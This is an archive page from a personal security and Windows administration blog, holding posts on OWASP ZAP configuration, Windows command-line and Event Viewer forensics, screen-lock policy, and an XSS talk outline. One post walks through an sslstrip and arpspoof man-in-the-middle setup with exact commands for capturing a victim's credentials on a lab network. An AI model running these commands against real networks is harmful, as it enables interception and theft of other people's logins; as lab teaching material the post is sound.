Computers, Programming, Technology, Music, Literature

Plug-n-Hack and ZAP: manually changed proxy settings after initial pnh configuration

leave a comment »

 

Plug-n-Hack introduces and proposes new standards to integrate security tools with the browsers, enabling communication between them. OWASP ZAP has inbuilt support for Plug-n-Hack (pnh) which allows you to configure Firefox to change it’s proxy settings so that OWASP ZAP could watch the FireFox traffic.

Configuration is a child’s play. Point your browser to the ZAP proxy address, follow instructions, and you are done. Just like the gif image below.

Plug-n-Hack and Zap

This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.

clip_image002

All works.

But, out of curiosity if you went and changed the FireFox proxy settings to No Proxy or Auto-detect proxy settings for this network or Use system proxy settings then the FireFox traffic would not be proxied through ZAP which is expected, Right? That works just fine.

However, when you want Firefox traffic to be proxied through ZAP again, you would copy paste the ZAP proxy address (http://localhost:7070/pnh) in Firefox again, and Firefox would then say A provider with this name has already been configured

clip_image002[5]

What is your expectation now?

I don’t know, as a user my expectation when I pasted the http://localhost:7070/pnh url in Firefox is that it should configure my Browser to route it’s traffic via ZAP. But that does not happen.

How to fix?

You can override the proxy settings yourself. Or you could actually use pnh to clear and remove a configuration and then point Firefox to http://localhost:7070/pnh

Shift + F2 in Firefox and then two commands for you:

 

pnh config clear ‘OWASP ZAP’

pnh config remove ‘OWASP ZAP’

 

clip_image002[7]

clip_image004

Written by gmaran23

November 19, 2014 at 6:13 pm

Windows: Get MAC address from the command line

leave a comment »

 

Windows changes with every version and the UI gets twisted and twisted, for a computer user that works with command line for administrative tasks, things are pretty much the same.

If you want to gather the list of MAC address on a particular computer run wither of the below commands:

1. getmac

getmac

image

2. find on ipconfig –all.

 

ipconfig -all | find /i "Physical Address"

 

 

image

Written by gmaran23

November 6, 2014 at 2:37 pm

Posted in Windows

Tagged with , , , ,

Process Explorer vs Process Hacker–Part 1 of 2

leave a comment »

Originally posted on chentiangemalc:

Process Explorer the tool we’ve all come to love as “Task Manager on Steroids” has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!

image

By version 2.01 it had been renamed to HandleEx added some more process properties and kill feature.

image

It wasn’t until 16 June 2001 when Version 5.0 came out that it got renamed to Process Explorer. ( I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case as of May 2011 with version 14.12 the tool has come a long way to be one of the most advanced “task manager” tools available:

image

However an open source project has been working on a competing product since…

View original 1,637 more words

Written by gmaran23

September 28, 2014 at 1:27 pm

Posted in Uncategorized

Process Explorer vs Process Hacker–Part 2 of 2

leave a comment »

Originally posted on chentiangemalc:

Continuing from Part 1 here http://chentiangemalc.wordpress.com/2011/06/13/process-explorer-vs-process-hackerpart-1-of-2/ we will now compare more advanced features of Process Explorer & Process Hacker.

Run As Options

Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”.While Process Hacker has “Run”, “Run As Limited User”, and “Run As”

In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.

However Process Hacker’s Run As is the most powerful with many special options…

image

User name can be any standard user name but also can include special accounts such as:

image

We can also select what “type”

image

Specific sessions can be targeted

image

as well as Desktops…

image

Finding Open Handles/DLLs

In Process Hacker this is found via Hacker | Find Handles or DLLs menu option, in Process Explorer it is via Find | Find Handle or DLL

The main difference here is…

View original 757 more words

Written by gmaran23

September 28, 2014 at 1:26 pm

Posted in Uncategorized

Devouring Security: Cross Site Scripting [XSS]

leave a comment »

 

 

http://www.slideshare.net/gmaran23/insufficient-data-validation-risks-xss

 

 

 

 

Agenda in <ul><li>

 

·         Risk, Stories & the news

·         XSS Anatomy

·         Untrusted Data Sources – Well, Where did that come from?

·         Shouldn’t it be called CSS instead?

·         Types of XSS

-          Type 0 [DOM based]

-          Type 1 [Reflected or Non-persistent XSS]

-          Type 2 [Persistent or Stored XSS]

·         Live Demo: XSS 101 with alert(‘hello XSS world’)

·         Live Demo: Cookie Hijacking and Privilege Escalation

-          Face/Off with John Travolta and Nicolas Cage

·         Live Demo: Let’s deploy some Key loggers,huh?

·         Mitigations

-          Input Sanitization

-          Popular Libraries for .Net, Java, php

§  Demo: Input sanitization

-          Whitelists (vs. Blackists)

-          Output Encoding

§  Contextual

§  Demo: Output Encoding

-          Browser Protections & bypasses

-          Framework Protections & bypasses

-          Content Security Policy (CSP) in brief

·         Secure Code reviews: Spot an XSS, How?

·         Tools: Do we have an option?

·         XSS Buzz and how to Fuzz

·         Renowned Cheat sheets

·         Further reading & References

 

Does your Autolock Domain Workstation policy fail sometimes? But why?

leave a comment »

 

This article was originally published for www.prowareness.com and could be located at http://www.prowareness.com/blog/does-your-autolock-domain-workstation-policy-fail-sometimes-but-why/

 

The “Password Protect Screensaver” and the “Screen Saver Timeout” controlled by the group policy enables the screen saver to kick in at the specified interval of inactivity and on resume

displays the logon screen and so the workstation needs to be unlocked.

 

Then the normal procedure if you are doing it for the first time, you do a GPUDATE /FORCE. The policy would work like expected, however if some users/managers keep quibbling about their workstation not getting locked after the specified interval, check if any of the below exceptions apply.

 

  1. There is a video playing in YouTube or any website that uses flash based or html5 video player. This should be the active window.
  2. There is a video playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
  3. There is an audio playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
  4. There is an automated test running. Desktop app automation or browser automation.
  5. A PowerPoint slideshow in progress.

 

The moment a computer is joined to a domain domain the policy would be effective and in case it did not work then it could be because of the above exceptions or the computer was not a part of the domain. The exceptions are asserted based on the fact that they let the operating system know that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen get’s locked while you are enjoying a movie or you are in the middle of a presentation.

Written by gmaran23

September 26, 2014 at 2:08 pm

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication

leave a comment »

 

 

 

OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and scanner, and proxy, ir required)

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran
renouncedthoughts.wordpress.com/
vimeo.com/gmaran23


 

Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to vimeo. Thanks to Simon Bennets for feedback and sugesstions.

 

 

 

Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting

leave a comment »

 

 

 

You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?

 

 

http://www.thoughtcrime.org/software/sslstrip/

 

 

Victim - Windows 7 – 192.168.100.11

Attacker – Kali linux – 192.168.100.215

 

arpspoof gateway – 192.168.100.1

 

 

•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

 

•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

 

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

 

•Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>

 

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

 

•Run sslstrip.

sslstrip.py -l <listenPort>

 

sslstrip

 

Written by gmaran23

July 4, 2014 at 8:58 pm

Event Viewer – Filtering user events for forensics and audits

leave a comment »

 

This article was originally published for www.prowareness.com and could be located at Event Viewer – Filtering user events for forensics and audits

 

Skip the story

Let’s say you are tracking down some user, or trying to find users that logged in to a common Windows workstation at a timeline. Sounds downright easy with Event Viewer right? Create a custom view or filter the current view of the the Windows Logs\Security events, type in the user account in the User: textbox, and you should be done. But it does not work because it is not supposed to work by design.

be03e3e4d7818819e46541451caa9157

Fig: 1

When the event viewer generates a query for the filter that we created to query a particular users activity, it actually associates the SID of that user to the actual query, and returns you 0 events.

368794d492cb419fced33fd843618aef

Fig: 2

Why did it return 0 events? It is ok, that the user name that was typed in to the User: textbox got converted to the SID. But shouldn’t it have listed activities for that user? However, if you go the Windows Logs\Security (without any filters), you’d wonder that there are actually many events logged for the user name (Account Name: ) that you want to filter (ma is the user name in the sample).

8dbb467a192f626642ec8a51ec0d12e8

Fig: 3

Picking a particular event, if you click Details to view the same event in xml or friendly view, ma (the user we want to query) is actually the TargetUserName w.r.t the event viewer database, and the TargetUserSid is the Sid associated to the user ma.

7afcc382abf7d35bd00b9eff27d63e37

Fig: 4

3f71a4f2caf077fbf10c9dde43873458

Fig: 5

Let’s pause for a moment and think back, If the SID for the user is called as TargetUserSid in the Details view, shouldn’t the Query that Event Viewer generated in Fig 2 actually be TargetUserSid instead of UserID.

 

That is,

 

<QueryList> 
  <Query Id="0" Path="Security"> 
    <Select Path="Security">*[System[Security[@TargetUserSid='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select> 
  </Query> 
</QueryList>

 

instead of

 

<QueryList> 
  <Query Id="0" Path="Security"> 
    <Select Path="Security">*[System[Security[@UserID='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select> 
  </Query> 
</QueryList>

 

May be I am misunderstood, may be I do not understand the Event Viewer terminologies. I don’t know. All we expect is when we type the User: we want to filter the logs for, let the event viewer do it’s own queries and it’s conversions, I’d like to see the logs for that particular user. Since that does not work as expected, how do we actually see the Security logs for a user?

 

Use the below xml when you create the custom filter or when you try to filter the an existing log path. Remember it is the subjectUsername in the xml query.

 

<QueryList> 
  <Query Id="0" Path="Security"> 
    <Select Path="Security">* [EventData[Data[@Name='subjectUsername']='ma']]</Select> 
  </Query> 
</QueryList>

 

If there is an easy way, let me know.

Also, below is a table of logon events and logon types explained by their code. The list below is derived from a SANS poster named SANS-Digital-Forensics-and-Incident-Response-Poster-2012.pdf. I lost the hyperlink of that poster, but a more descriptive is list could be found at –

http://www.sans.org/reading-room/whitepapers/forensics/windows-logon-forensics-34132

 

Logon Type

Explanation

 

2

Logon via console

3

Network Logon

4

Batch Logon

5

Windows Service Logon

7

Credentials used to unlock screen

8

Network logon sending credentials (cleartext) 

9

Different credentials used than logged on user

10

Remote interactive logon (RDP)

11

Cached credentials used to logon

 

Event ID

XP / Win 7

Explanation

 

528 / 4624

Successful Logon

529 / 4625

Failed Logon

538 / 4634

Successful Logoff 

540 / 4624

Successful Network Logon

Written by gmaran23

July 4, 2014 at 8:41 pm

Follow

Get every new post delivered to your Inbox.